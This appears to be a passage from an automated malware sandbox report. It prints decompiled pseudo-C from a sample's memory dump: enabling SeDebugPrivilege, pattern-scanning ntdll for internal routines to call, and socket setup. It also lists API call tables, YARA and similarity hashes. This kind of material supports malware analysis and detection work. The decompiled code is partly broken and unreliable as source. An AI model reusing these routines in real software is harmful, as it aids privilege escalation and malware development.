				intOrPtr _v12;
				struct _TOKEN_PRIVILEGES _v24;
				void* _v28;
				signed int _t11;
				void* _t22;
				signed int _t33;

				_t11 =  *0x4f03008; // 0x3d21fb31
				_v8 = _t11 ^ _t33;
				if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v28) != 0) {
					_v24.PrivilegeCount = 1;
					_v12 = 2;
					LookupPrivilegeValueW(0, L"SeDebugPrivilege",  &(_v24.Privileges));
					AdjustTokenPrivileges(_v28, 0,  &_v24, 0x10, 0, 0);
					GetLastError();
					_t32 =  !=  ? 0 : 1;
					CloseHandle(_v28);
					_t22 =  !=  ? 0 : 1;
					return E04ED572E(_v8 ^ _t33);
				} else {
					return E04ED572E(_v8 ^ _t33);
				}
			}










                                                                                    0x04ecaa76
                                                                                    0x04ecaa7d
                                                                                    0x04ecaa9b
                                                                                    0x04ecaaaf
                                                                                    0x04ecaaba
                                                                                    0x04ecaac1
                                                                                    0x04ecaad6
                                                                                    0x04ecaadc
                                                                                    0x04ecaae9
                                                                                    0x04ecaaec
                                                                                    0x04ecaaf5
                                                                                    0x04ecab02
                                                                                    0x04ecaa9e
                                                                                    0x04ecaaab
                                                                                    0x04ecaaab

                                                                                    APIs
                                                                                    • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,?,ntdll.dll,74B60320,00000000,?), ref: 04ECAA8C
                                                                                    • OpenProcessToken.ADVAPI32(00000000,?,?,?,ntdll.dll,74B60320,00000000,?), ref: 04ECAA93
                                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 04ECAAC1
                                                                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000010,00000000,00000000,?,?,?,ntdll.dll,74B60320), ref: 04ECAAD6
                                                                                    • GetLastError.KERNEL32(?,?,?,ntdll.dll,74B60320), ref: 04ECAADC
                                                                                    • CloseHandle.KERNEL32(?,?,?,?,ntdll.dll,74B60320), ref: 04ECAAEC
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ProcessToken$AdjustCloseCurrentErrorHandleLastLookupOpenPrivilegePrivilegesValue
                                                                                    • String ID: SeDebugPrivilege
                                                                                    • API String ID: 3398352648-2896544425
                                                                                    • Opcode ID: e73888ab0bb8817dbb14feed59c2620f27898e50900df4eec6d653651a25777b
                                                                                    • Instruction ID: 73f3663defabb560694663ebe6f46a9445bb6f3260615fd68a28df49c5d1b246
                                                                                    • Opcode Fuzzy Hash: e73888ab0bb8817dbb14feed59c2620f27898e50900df4eec6d653651a25777b
                                                                                    • Instruction Fuzzy Hash: F1019B75A0120CFBEB10DFA5EC0ABBE7BB9EF44701F10005AFD05E6184DA755D448B94
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04EBC540, Relevance: 10.9, APIs: 2, Strings: 4, Instructions: 359libraryloaderCOMMONCrypto
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 26%
                                                                                    			E04EBC540(void* __ebx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				short _v12;
				char _v14;
				short _v16;
				intOrPtr _v20;
				short _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v296;
				intOrPtr _v300;
				intOrPtr _v304;
				char _v308;
				intOrPtr _v312;
				intOrPtr _v316;
				intOrPtr _v320;
				intOrPtr _v324;
				signed int _t101;
				_Unknown_base(*)()* _t108;
				void* _t113;
				intOrPtr _t114;
				intOrPtr _t115;
				void* _t139;
				intOrPtr* _t140;
				intOrPtr* _t150;
				intOrPtr* _t153;
				intOrPtr* _t157;
				void* _t158;
				void* _t160;
				void* _t161;
				void* _t162;
				void* _t169;
				void* _t170;
				intOrPtr _t175;
				void* _t176;
				void* _t182;
				intOrPtr* _t188;
				signed int _t189;
				void* _t191;
				void* _t197;
				intOrPtr _t198;
				void* _t200;
				void* _t202;
				void* _t203;
				void* _t205;
				void* _t209;
				void* _t211;
				void* _t214;
				void* _t217;
				struct HINSTANCE__* _t220;
				void* _t221;
				void* _t222;
				void* _t223;
				void* _t224;
				void* _t225;
				void* _t226;
				signed int _t227;

				_t197 = __edi;
				_t101 =  *0x4f03008; // 0x3d21fb31
				_v8 = _t101 ^ _t227;
				_v324 = _a4;
				_v316 = _a8;
				_t220 = GetModuleHandleA("ntdll");
				if(_t220 == 0) {
					L91:
					return E04ED572E(_v8 ^ _t227);
				} else {
					E04EDDAD0(__edi,  &_v308, 0, 0x114);
					_t108 = GetProcAddress(_t220, "RtlGetVersion");
					if(_t108 == 0) {
						goto L91;
					} else {
						_push( &_v308);
						if( *_t108() != 0 || _t220->i != 0x5a4d) {
							goto L91;
						} else {
							_t188 =  *((intOrPtr*)(_t220 + 0x3c)) + _t220;
							if( *_t188 != 0x4550) {
								goto L91;
							} else {
								_t157 = 0;
								_t113 = ( *(_t188 + 0x14) & 0x0000ffff) + 0x18 + _t188;
								_t189 =  *(_t188 + 6) & 0x0000ffff;
								if(_t189 == 0) {
									goto L91;
								} else {
									while(( *(_t113 + 0x24) & 0x20000000) == 0) {
										_t157 = _t157 + 1;
										_t113 = _t113 + 0x28;
										if(_t157 < _t189) {
											continue;
										} else {
											return E04ED572E(_v8 ^ _t227);
										}
										goto L92;
									}
									_push(_t197);
									_t198 =  *((intOrPtr*)(_t113 + 0x10));
									_v320 = _t198;
									_t191 =  *((intOrPtr*)(_t113 + 0xc)) + _t220;
									if(_t191 == 0 || _t198 == 0) {
										L90:
										goto L91;
									} else {
										_t114 = _v304;
										if(_t114 != 0xa) {
											if(_t114 != 6) {
												goto L90;
											} else {
												_t115 = _v300;
												if(_t115 == 3) {
													goto L35;
												} else {
													if(_t115 != 2) {
														if(_t115 != 1) {
															goto L90;
														} else {
															_t223 = 0;
															_v20 = 0x8b55ff8b;
															_v16 = 0x56ec;
															_t203 = _t198 + 0xfffffff9;
															_v14 = 0x68;
															_v312 = 0x38e05d89;
															do {
																_t161 = 0;
																while( *((intOrPtr*)(_t161 + _t223 + _t191)) ==  *((intOrPtr*)(_t227 + _t161 - 0x10))) {
																	_t161 = _t161 + 1;
																	if(_t161 < 7) {
																		continue;
																	}
																	break;
																}
																if(_t161 == 7) {
																	_t153 = _t223 + _t191;
																	if(_t153 == 0) {
																		goto L90;
																	} else {
																		_t224 = 0;
																		_t205 = _v320 + 0xfffffffc;
																		do {
																			_t162 = 0;
																			while( *((intOrPtr*)(_t162 + _t224 + _t191)) ==  *((intOrPtr*)(_t227 + _t162 - 0x134))) {
																				_t162 = _t162 + 1;
																				if(_t162 < 4) {
																					continue;
																				}
																				break;
																			}
																			if(_t162 == 4) {
																				goto L76;
																			} else {
																				goto L74;
																			}
																			goto L92;
																			L74:
																			_t224 = _t224 + 1;
																		} while (_t224 <= _t205);
																		return E04ED572E(_v8 ^ _t227);
																	}
																} else {
																	goto L66;
																}
																goto L92;
																L66:
																_t223 = _t223 + 1;
															} while (_t223 <= _t203);
															return E04ED572E(_v8 ^ _t227);
														}
													} else {
														_t225 = 0;
														_v20 = 0x8b55ff8b;
														_v16 = 0x56ec;
														_t209 = _t198 + 0xfffffff9;
														_v14 = 0x68;
														_v312 = 0x38e05d89;
														do {
															_t169 = 0;
															asm("o16 nop [eax+eax]");
															while( *((intOrPtr*)(_t169 + _t225 + _t191)) ==  *((intOrPtr*)(_t227 + _t169 - 0x10))) {
																_t169 = _t169 + 1;
																if(_t169 < 7) {
																	continue;
																}
																break;
															}
															if(_t169 == 7) {
																_t153 = _t225 + _t191;
																if(_t153 == 0) {
																	goto L90;
																} else {
																	_t224 = 0;
																	_t211 = _v320 + 0xfffffffc;
																	do {
																		_t170 = 0;
																		asm("o16 nop [eax+eax]");
																		while( *((intOrPtr*)(_t170 + _t224 + _t191)) ==  *((intOrPtr*)(_t227 + _t170 - 0x134))) {
																			_t170 = _t170 + 1;
																			if(_t170 < 4) {
																				continue;
																			}
																			break;
																		}
																		if(_t170 == 4) {
																			L76:
																			_t125 =  *((intOrPtr*)(_t224 + _t191 + 0x1b));
																			if( *((intOrPtr*)(_t224 + _t191 + 0x1b)) == 0) {
																				goto L90;
																			} else {
																				 *_t153(_v324,  *((intOrPtr*)(_v316 + 0x50)));
																				return E04ED572E(_v8 ^ _t227, _t125);
																			}
																		} else {
																			goto L58;
																		}
																		goto L92;
																		L58:
																		_t224 = _t224 + 1;
																	} while (_t224 <= _t211);
																	return E04ED572E(_v8 ^ _t227);
																}
															} else {
																goto L50;
															}
															goto L92;
															L50:
															_t225 = _t225 + 1;
														} while (_t225 <= _t209);
														return E04ED572E(_v8 ^ _t227);
													}
												}
											}
										} else {
											if(_v300 != 0) {
												goto L90;
											} else {
												_t175 = _v296;
												if(_t175 < 0x3fab) {
													if(_t175 - 0x3ad7 > 0x4d3) {
														if(_t175 < 0x3ad7) {
															L35:
															_t150 = 0;
															_v20 = 0x8b575653;
															_t221 = 0;
															_v16 = 0x50f98bda;
															_v32 = 0x89f4458d;
															_t200 = _t198 + 0xfffffff8;
															_v28 = 0x8d50f855;
															_v24 = 0xfc55;
															do {
																_t158 = 0;
																while( *((intOrPtr*)(_t158 + _t221 + _t191)) ==  *((intOrPtr*)(_t227 + _t158 - 0x10))) {
																	_t158 = _t158 + 1;
																	if(_t158 < 8) {
																		continue;
																	}
																	break;
																}
																if(_t158 == 8) {
																	_t150 = _t191 - 0xb + _t221;
																} else {
																	goto L40;
																}
																L79:
																if(_t150 != 0) {
																	L89:
																	 *_t150();
																} else {
																	_t222 = 0;
																	_t202 = _v320 + 0xfffffff6;
																	do {
																		_t160 = 0;
																		while( *((intOrPtr*)(_t160 + _t222 + _t191)) ==  *((intOrPtr*)(_t227 + _t160 - 0x1c))) {
																			_t160 = _t160 + 1;
																			if(_t160 < 0xa) {
																				continue;
																			}
																			break;
																		}
																		if(_t160 == 0xa) {
																			_t150 = _t191 - 0xb + _t222;
																		} else {
																			goto L85;
																		}
																		L88:
																		if(_t150 != 0) {
																			goto L89;
																		}
																		goto L90;
																		L85:
																		_t222 = _t222 + 1;
																	} while (_t222 <= _t202);
																	goto L88;
																}
																goto L90;
																L40:
																_t221 = _t221 + 1;
															} while (_t221 <= _t200);
															goto L79;
														}
														goto L90;
													} else {
														_t226 = 0;
														_v20 = 0x89f0458d;
														_v16 = 0x8d50f855;
														_t214 = _t198 + 0xfffffff6;
														_v12 = 0xf455;
														do {
															_t176 = 0;
															while( *((intOrPtr*)(_t176 + _t226 + _t191)) ==  *((intOrPtr*)(_t227 + _t176 - 0x10))) {
																_t176 = _t176 + 1;
																if(_t176 < 0xa) {
																	continue;
																}
																break;
															}
															if(_t176 == 0xa) {
																_t139 = _t191 - 0xb;
																goto L32;
															} else {
																goto L29;
															}
															goto L92;
															L29:
															_t226 = _t226 + 1;
														} while (_t226 <= _t214);
														return E04ED572E(_v8 ^ _t227);
													}
												} else {
													_t226 = 0;
													_v20 = 0x8d575653;
													_v16 = 0xfa8bf845;
													_t217 = _t198 + 0xfffffff8;
													do {
														_t182 = 0;
														while( *((intOrPtr*)(_t182 + _t226 + _t191)) ==  *((intOrPtr*)(_t227 + _t182 - 0x10))) {
															_t182 = _t182 + 1;
															if(_t182 < 8) {
																continue;
															}
															break;
														}
														if(_t182 == 8) {
															_t139 = _t191 - 8;
															L32:
															_t140 = _t139 + _t226;
															if(_t140 == 0) {
																goto L90;
															} else {
																 *_t140();
																return E04ED572E(_v8 ^ _t227);
															}
														} else {
															goto L20;
														}
														goto L92;
														L20:
														_t226 = _t226 + 1;
													} while (_t226 <= _t217);
													return E04ED572E(_v8 ^ _t227);
												}
											}
										}
									}
								}
							}
						}
					}
				}
				L92:
			}



























































                                                                                    0x04ebc540
                                                                                    0x04ebc549
                                                                                    0x04ebc550
                                                                                    0x04ebc560
                                                                                    0x04ebc566
                                                                                    0x04ebc572
                                                                                    0x04ebc576
                                                                                    0x04ebc97e
                                                                                    0x04ebc98d
                                                                                    0x04ebc57c
                                                                                    0x04ebc58a
                                                                                    0x04ebc598
                                                                                    0x04ebc5a0
                                                                                    0x00000000
                                                                                    0x04ebc5a6
                                                                                    0x04ebc5ac
                                                                                    0x04ebc5b1
                                                                                    0x00000000
                                                                                    0x04ebc5c5
                                                                                    0x04ebc5c8
                                                                                    0x04ebc5d0
                                                                                    0x00000000
                                                                                    0x04ebc5d6
                                                                                    0x04ebc5da
                                                                                    0x04ebc5df
                                                                                    0x04ebc5e1
                                                                                    0x04ebc5e7
                                                                                    0x00000000
                                                                                    0x04ebc5f0
                                                                                    0x04ebc5f0
                                                                                    0x04ebc5f9
                                                                                    0x04ebc5fa
                                                                                    0x04ebc5ff
                                                                                    0x00000000
                                                                                    0x04ebc603
                                                                                    0x04ebc610
                                                                                    0x04ebc610
                                                                                    0x00000000
                                                                                    0x04ebc5ff
                                                                                    0x04ebc616
                                                                                    0x04ebc617
                                                                                    0x04ebc61a
                                                                                    0x04ebc620
                                                                                    0x04ebc622
                                                                                    0x04ebc97d
                                                                                    0x00000000
                                                                                    0x04ebc630
                                                                                    0x04ebc630
                                                                                    0x04ebc639
                                                                                    0x04ebc78b
                                                                                    0x00000000
                                                                                    0x04ebc791
                                                                                    0x04ebc791
                                                                                    0x04ebc79a
                                                                                    0x00000000
                                                                                    0x04ebc79c
                                                                                    0x04ebc79f
                                                                                    0x04ebc859
                                                                                    0x00000000
                                                                                    0x04ebc85f
                                                                                    0x04ebc85f
                                                                                    0x04ebc861
                                                                                    0x04ebc868
                                                                                    0x04ebc86e
                                                                                    0x04ebc871
                                                                                    0x04ebc875
                                                                                    0x04ebc880
                                                                                    0x04ebc880
                                                                                    0x04ebc882
                                                                                    0x04ebc88e
                                                                                    0x04ebc892
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04ebc892
                                                                                    0x04ebc897
                                                                                    0x04ebc8b1
                                                                                    0x04ebc8b6
                                                                                    0x00000000
                                                                                    0x04ebc8bc
                                                                                    0x04ebc8c2
                                                                                    0x04ebc8c4
                                                                                    0x04ebc8c7
                                                                                    0x04ebc8c7
                                                                                    0x04ebc8d0
                                                                                    0x04ebc8df
                                                                                    0x04ebc8e3
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04ebc8e3
                                                                                    0x04ebc8e8
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04ebc8ea
                                                                                    0x04ebc8ea
                                                                                    0x04ebc8eb
                                                                                    0x04ebc8ff
                                                                                    0x04ebc8ff
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04ebc899
                                                                                    0x04ebc899
                                                                                    0x04ebc89a
                                                                                    0x04ebc8ae
                                                                                    0x04ebc8ae
                                                                                    0x04ebc7a5
                                                                                    0x04ebc7a5
                                                                                    0x04ebc7a7
                                                                                    0x04ebc7ae
                                                                                    0x04ebc7b4
                                                                                    0x04ebc7b7
                                                                                    0x04ebc7bb
                                                                                    0x04ebc7c5
                                                                                    0x04ebc7c5
                                                                                    0x04ebc7c7
                                                                                    0x04ebc7d0
                                                                                    0x04ebc7dc
                                                                                    0x04ebc7e0
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04ebc7e0
                                                                                    0x04ebc7e5
                                                                                    0x04ebc7ff
                                                                                    0x04ebc804
                                                                                    0x00000000
                                                                                    0x04ebc80a
                                                                                    0x04ebc810
                                                                                    0x04ebc812
                                                                                    0x04ebc815
                                                                                    0x04ebc815
                                                                                    0x04ebc817
                                                                                    0x04ebc820
                                                                                    0x04ebc82f
                                                                                    0x04ebc833
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04ebc833
                                                                                    0x04ebc838
                                                                                    0x04ebc902
                                                                                    0x04ebc902
                                                                                    0x04ebc908
                                                                                    0x00000000
                                                                                    0x04ebc90a
                                                                                    0x04ebc91a
                                                                                    0x04ebc92c
                                                                                    0x04ebc92c
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04ebc83e
                                                                                    0x04ebc83e
                                                                                    0x04ebc83f
                                                                                    0x04ebc853
                                                                                    0x04ebc853
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04ebc7e7
                                                                                    0x04ebc7e7
                                                                                    0x04ebc7e8
                                                                                    0x04ebc7fc
                                                                                    0x04ebc7fc
                                                                                    0x04ebc79f
                                                                                    0x04ebc79a
                                                                                    0x04ebc63f
                                                                                    0x04ebc646
                                                                                    0x00000000
                                                                                    0x04ebc64c
                                                                                    0x04ebc64c
                                                                                    0x04ebc658
                                                                                    0x04ebc6b1
                                                                                    0x04ebc732
                                                                                    0x04ebc738
                                                                                    0x04ebc738
                                                                                    0x04ebc73a
                                                                                    0x04ebc741
                                                                                    0x04ebc743
                                                                                    0x04ebc74a
                                                                                    0x04ebc751
                                                                                    0x04ebc754
                                                                                    0x04ebc75b
                                                                                    0x04ebc761
                                                                                    0x04ebc761
                                                                                    0x04ebc763
                                                                                    0x04ebc76f
                                                                                    0x04ebc773
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04ebc773
                                                                                    0x04ebc778
                                                                                    0x04ebc932
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04ebc934
                                                                                    0x04ebc936
                                                                                    0x04ebc96c
                                                                                    0x04ebc97b
                                                                                    0x04ebc938
                                                                                    0x04ebc93e
                                                                                    0x04ebc940
                                                                                    0x04ebc943
                                                                                    0x04ebc943
                                                                                    0x04ebc945
                                                                                    0x04ebc951
                                                                                    0x04ebc955
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04ebc955
                                                                                    0x04ebc95a
                                                                                    0x04ebc966
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04ebc968
                                                                                    0x04ebc96a
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04ebc95c
                                                                                    0x04ebc95c
                                                                                    0x04ebc95d
                                                                                    0x00000000
                                                                                    0x04ebc961
                                                                                    0x00000000
                                                                                    0x04ebc77e
                                                                                    0x04ebc77e
                                                                                    0x04ebc77f
                                                                                    0x00000000
                                                                                    0x04ebc783
                                                                                    0x00000000
                                                                                    0x04ebc6b3
                                                                                    0x04ebc6b3
                                                                                    0x04ebc6b5
                                                                                    0x04ebc6bc
                                                                                    0x04ebc6c3
                                                                                    0x04ebc6c6
                                                                                    0x04ebc6d0
                                                                                    0x04ebc6d0
                                                                                    0x04ebc6d2
                                                                                    0x04ebc6de
                                                                                    0x04ebc6e2
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04ebc6e2
                                                                                    0x04ebc6e7
                                                                                    0x04ebc701
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04ebc6e9
                                                                                    0x04ebc6e9
                                                                                    0x04ebc6ea
                                                                                    0x04ebc6fe
                                                                                    0x04ebc6fe
                                                                                    0x04ebc65a
                                                                                    0x04ebc65a
                                                                                    0x04ebc65c
                                                                                    0x04ebc663
                                                                                    0x04ebc66a
                                                                                    0x04ebc670
                                                                                    0x04ebc670
                                                                                    0x04ebc672
                                                                                    0x04ebc67e
                                                                                    0x04ebc682
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04ebc682
                                                                                    0x04ebc687
                                                                                    0x04ebc6a1
                                                                                    0x04ebc704
                                                                                    0x04ebc704
                                                                                    0x04ebc706
                                                                                    0x00000000
                                                                                    0x04ebc70c
                                                                                    0x04ebc717
                                                                                    0x04ebc729
                                                                                    0x04ebc729
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04ebc689
                                                                                    0x04ebc689
                                                                                    0x04ebc68a
                                                                                    0x04ebc69e
                                                                                    0x04ebc69e
                                                                                    0x04ebc658
                                                                                    0x04ebc646
                                                                                    0x04ebc639
                                                                                    0x04ebc622
                                                                                    0x04ebc5e7
                                                                                    0x04ebc5d0
                                                                                    0x04ebc5b1
                                                                                    0x04ebc5a0
                                                                                    0x00000000

                                                                                    APIs
                                                                                    • GetModuleHandleA.KERNEL32(ntdll,00000000,74E043E0), ref: 04EBC56C
                                                                                    • GetProcAddress.KERNEL32(00000000,RtlGetVersion), ref: 04EBC598
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: AddressHandleModuleProc
                                                                                    • String ID: RtlGetVersion$h$ntdll$V
                                                                                    • API String ID: 1646373207-3705289206
                                                                                    • Opcode ID: e5c2537e49d4288b75c2e0395e5845e89a7a69b4747da1b63fa626746d86ec4e
                                                                                    • Instruction ID: 95c041ecf7b59f62a1d61270ed3f001924bd45602a200bb0aa38c156f60d63d9
                                                                                    • Opcode Fuzzy Hash: e5c2537e49d4288b75c2e0395e5845e89a7a69b4747da1b63fa626746d86ec4e
                                                                                    • Instruction Fuzzy Hash: C8C11832A091188BDB358F68D4906FEF7A0FF46718F7421AEC9D65B551DB31A982CBC0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04ED39E0, Relevance: 10.7, APIs: 7, Instructions: 181networkCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 28%
                                                                                    			E04ED39E0(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags, long _a4, intOrPtr _a8, signed int _a12, signed int _a16, signed int* _a20, signed short* _a24) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr* _v32;
				intOrPtr* _v36;
				signed short _v50;
				char _v52;
				long _v56;
				signed int* _v60;
				intOrPtr _v64;
				void* _v76;
				intOrPtr* _v116;
				intOrPtr _v124;
				intOrPtr _v128;
				intOrPtr _v136;
				signed int _v148;
				intOrPtr _v152;
				intOrPtr _v156;
				long _v160;
				signed int _v164;
				intOrPtr _v168;
				signed int _v184;
				char _v188;
				intOrPtr _v192;
				intOrPtr _v196;
				signed int _v208;
				intOrPtr _v212;
				char _v216;
				signed int _t124;
				signed short _t127;
				void* _t128;
				signed int _t129;
				signed int _t130;
				signed int* _t131;
				intOrPtr _t132;
				signed int* _t135;
				void* _t137;
				signed int _t139;
				void* _t141;
				signed int _t144;
				intOrPtr _t154;
				signed int _t156;
				long _t160;
				long _t163;
				signed int _t165;
				signed int _t174;
				void* _t175;
				signed int _t176;
				long _t177;
				signed int _t180;
				signed int _t185;
				signed int _t187;
				long _t188;
				signed short _t191;
				signed int* _t195;
				signed int _t206;
				signed int _t209;
				signed int* _t210;
				signed int _t211;
				intOrPtr _t213;
				void* _t214;
				long _t222;
				signed int _t223;
				signed int _t225;
				intOrPtr* _t228;
				signed int _t229;
				signed int _t243;
				intOrPtr _t250;
				signed int _t252;
				signed int _t257;
				signed int _t261;
				signed short* _t265;
				intOrPtr* _t266;
				signed int _t268;
				signed int _t269;
				long _t270;
				intOrPtr _t277;
				signed short* _t278;
				signed int _t279;
				struct _CRITICAL_SECTION* _t281;
				intOrPtr _t283;
				intOrPtr _t285;
				signed int _t291;
				signed int _t292;
				signed int _t293;
				signed int _t294;
				void* _t295;
				signed int _t296;
				signed int _t297;

				_t124 =  *0x4f03008; // 0x3d21fb31
				_v8 = _t124 ^ _t291;
				_push(__ebx);
				_t209 = _a12;
				_push(__esi);
				_t277 = __ecx;
				_v56 = _a4;
				_v60 = _a20;
				_push(__edi);
				_t265 = _a24;
				_v64 = __ecx;
				_t127 = E04ECCC60(_a4, __ecx);
				_t250 = _a8;
				_t222 = _v56;
				 *_t265 = _t127;
				_push(_t265);
				if(_t127 == 0) {
					_t128 = E04ECCDA0(_t209, _t222, _t250, _t265, __ecx, __eflags);
				} else {
					_t128 = E04ECCD10(_t209, _t250, _t265, __ecx);
				}
				_t296 = _t295 + 4;
				if(_t128 != 0) {
					_t278 = _t277 + 0x5c;
					__eflags = _t209;
					if(_t209 == 0) {
						L9:
						_t129 =  *_t278 & 0x0000ffff;
						__eflags = _t129 - 2;
						if(_t129 == 2) {
							L14:
							_v56 = 1;
							__eflags = _t129 -  *_t265;
							if(_t129 ==  *_t265) {
								goto L12;
							} else {
								goto L35;
							}
						} else {
							__eflags = _t129 - 0x17;
							if(_t129 == 0x17) {
								goto L14;
							} else {
								_v56 = 0;
								L12:
								_t130 =  *_t265 & 0x0000ffff;
								_t210 = 0;
								__imp__#23(_t130, 1, 6);
								_t223 = _t130;
								_t131 = _v60;
								 *_t131 = _t223;
								__eflags = _t223 - 0xffffffff;
								if(_t223 != 0xffffffff) {
									_t132 = _v64;
									__eflags =  *(_t132 + 0x30);
									if( *(_t132 + 0x30) == 0) {
										L19:
										_t252 = 0;
										__eflags = 0;
									} else {
										__eflags =  *(_t132 + 0x34);
										if( *(_t132 + 0x34) <= 0) {
											goto L19;
										} else {
											_t252 = 1;
										}
									}
									_v20 = _t252;
									_v12 =  *(_t132 + 0x34);
									_t135 =  &_v20;
									_v16 =  *(_t132 + 0x30);
									__imp__WSAIoctl(_t223, 0x98000004, _t135, 0xc, 0, 0,  &_v24, 0, 0);
									__eflags = _t135 - 0xffffffff;
									if(_t135 != 0xffffffff) {
										L23:
										_t223 =  *_v60;
										_t137 = E04ECD0D0(_t210, _t223,  *((intOrPtr*)(_v64 + 4)), _t265, _t278);
										__eflags = _t137 - 0xffffffff;
										if(_t137 == 0xffffffff) {
											goto L37;
										} else {
											_t243 = _a16;
											__eflags = _t243;
											if(_t243 != 0) {
												__eflags = _v56 - _t210;
												if(_v56 == _t210) {
													__eflags =  *_t265 - 2;
													_t278 =  !=  ? 0x4f056e0 : 0x4f056c4;
												}
												asm("movups xmm0, [esi]");
												_t30 =  &(_t278[0xc]); // 0x0
												_t191 =  *_t30;
												asm("movups [ebp-0x30], xmm0");
												_v28 = _t191;
												asm("movq xmm0, [esi+0x10]");
												asm("movq [ebp-0x20], xmm0");
												__imp__#9(_t243);
												__eflags = _v52 - 2;
												_v50 = _t191;
												_t193 =  ==  ? 0x10 : 0x1c;
												_push( ==  ? 0x10 : 0x1c);
												_push( &_v52);
											} else {
												__eflags = _v56 - _t210;
												if(_v56 == _t210) {
													__eflags =  *_t265 - 2;
													_t278 =  !=  ? 0x4f056e0 : 0x4f056c4;
												}
												__eflags =  *_t278 - 2;
												_t200 =  !=  ? 0x1c : 0x10;
												_push( !=  ? 0x1c : 0x10);
												_push(_t278);
											}
											_t195 = _v60;
											__imp__#2( *_t195);
											__eflags = _t195 - 0xffffffff;
											if(_t195 == 0xffffffff) {
												_t131 =  *__imp__#111();
												goto L33;
											}
											goto L34;
										}
									} else {
										__imp__#111();
										__eflags = _t135 - 0x2733;
										if(_t135 == 0x2733) {
											goto L23;
										} else {
											__eflags = _t135 - 0xffffffff;
											if(_t135 == 0xffffffff) {
												_push(0x80004005);
												E04EB7AB0();
												L37:
												_push(0x80004005);
												E04EB7AB0();
												asm("int3");
												asm("int3");
												asm("int3");
												_push(_t291);
												_t292 = _t296;
												_push(_t210);
												_push(_t278);
												_t211 = _t223;
												_push(_t265);
												_t266 = _v116;
												_t279 = _t211 + 0x178;
												_t139 = E04ED4F30(_t279, _t223, _t266);
												__eflags = _t139;
												if(_t139 != 0) {
													SetLastError(0);
													_t225 = _t211;
													_t141 =  *((intOrPtr*)( *_t211 + 0xd8))( *_t266, _a4);
													__eflags = _t141 - 2;
													if(_t141 != 2) {
														__eflags = 0;
														return 0;
													} else {
														_t213 =  *_t266;
														_t268 =  *(_t279 + 4);
														__eflags = _t268;
														if(_t268 == 0) {
															L47:
															_push(0x80004005);
															E04EB7AB0();
															asm("int3");
															asm("int3");
															asm("int3");
															asm("int3");
															asm("int3");
															asm("int3");
															asm("int3");
															asm("int3");
															asm("int3");
															asm("int3");
															asm("int3");
															asm("int3");
															asm("int3");
															asm("int3");
															_push(_t292);
															_t293 = _t296;
															_t297 = _t296 - 0x18;
															_t144 =  *0x4f03008; // 0x3d21fb31
															_v148 = _t144 ^ _t293;
															_push(_t213);
															_push(_t279);
															_v152 = _v136;
															_push(_t268);
															_t269 = _t225;
															_v156 = _v128;
															_v168 = _v124;
															_v164 = _t269;
															_v160 = 0;
															__eflags = E04ECC4C0(_t269 + 0xb0,  &_v160);
															if(__eflags != 0) {
																_t214 = _v28;
															} else {
																_t285 =  *((intOrPtr*)(_t269 + 0xa4));
																_t214 = HeapAlloc( *(_t269 + 0x94), 0, _t285 + 0x38);
																_v28 = _t214;
																_t68 = _t214 + 0x38; // 0x38
																 *(_t214 + 0x14) = _t269 + 0x94;
																 *((intOrPtr*)(_t214 + 0x24)) = _t285;
																 *((intOrPtr*)(_t214 + 0x20)) = _t68;
															}
															_push(_v24);
															asm("xorps xmm0, xmm0");
															_push(_v20);
															asm("movups [ebx], xmm0");
															 *(_t214 + 0x10) = 0;
															 *(_t214 + 0x1c) = 0;
															 *(_t214 + 0x1c) =  *(_t269 + 0x18);
															_t270 = E04ED2430(_t269, __eflags);
															_t79 = _t270 + 0x54; // 0x54
															_t281 = _t79;
															EnterCriticalSection(_t281);
															_push(_a12);
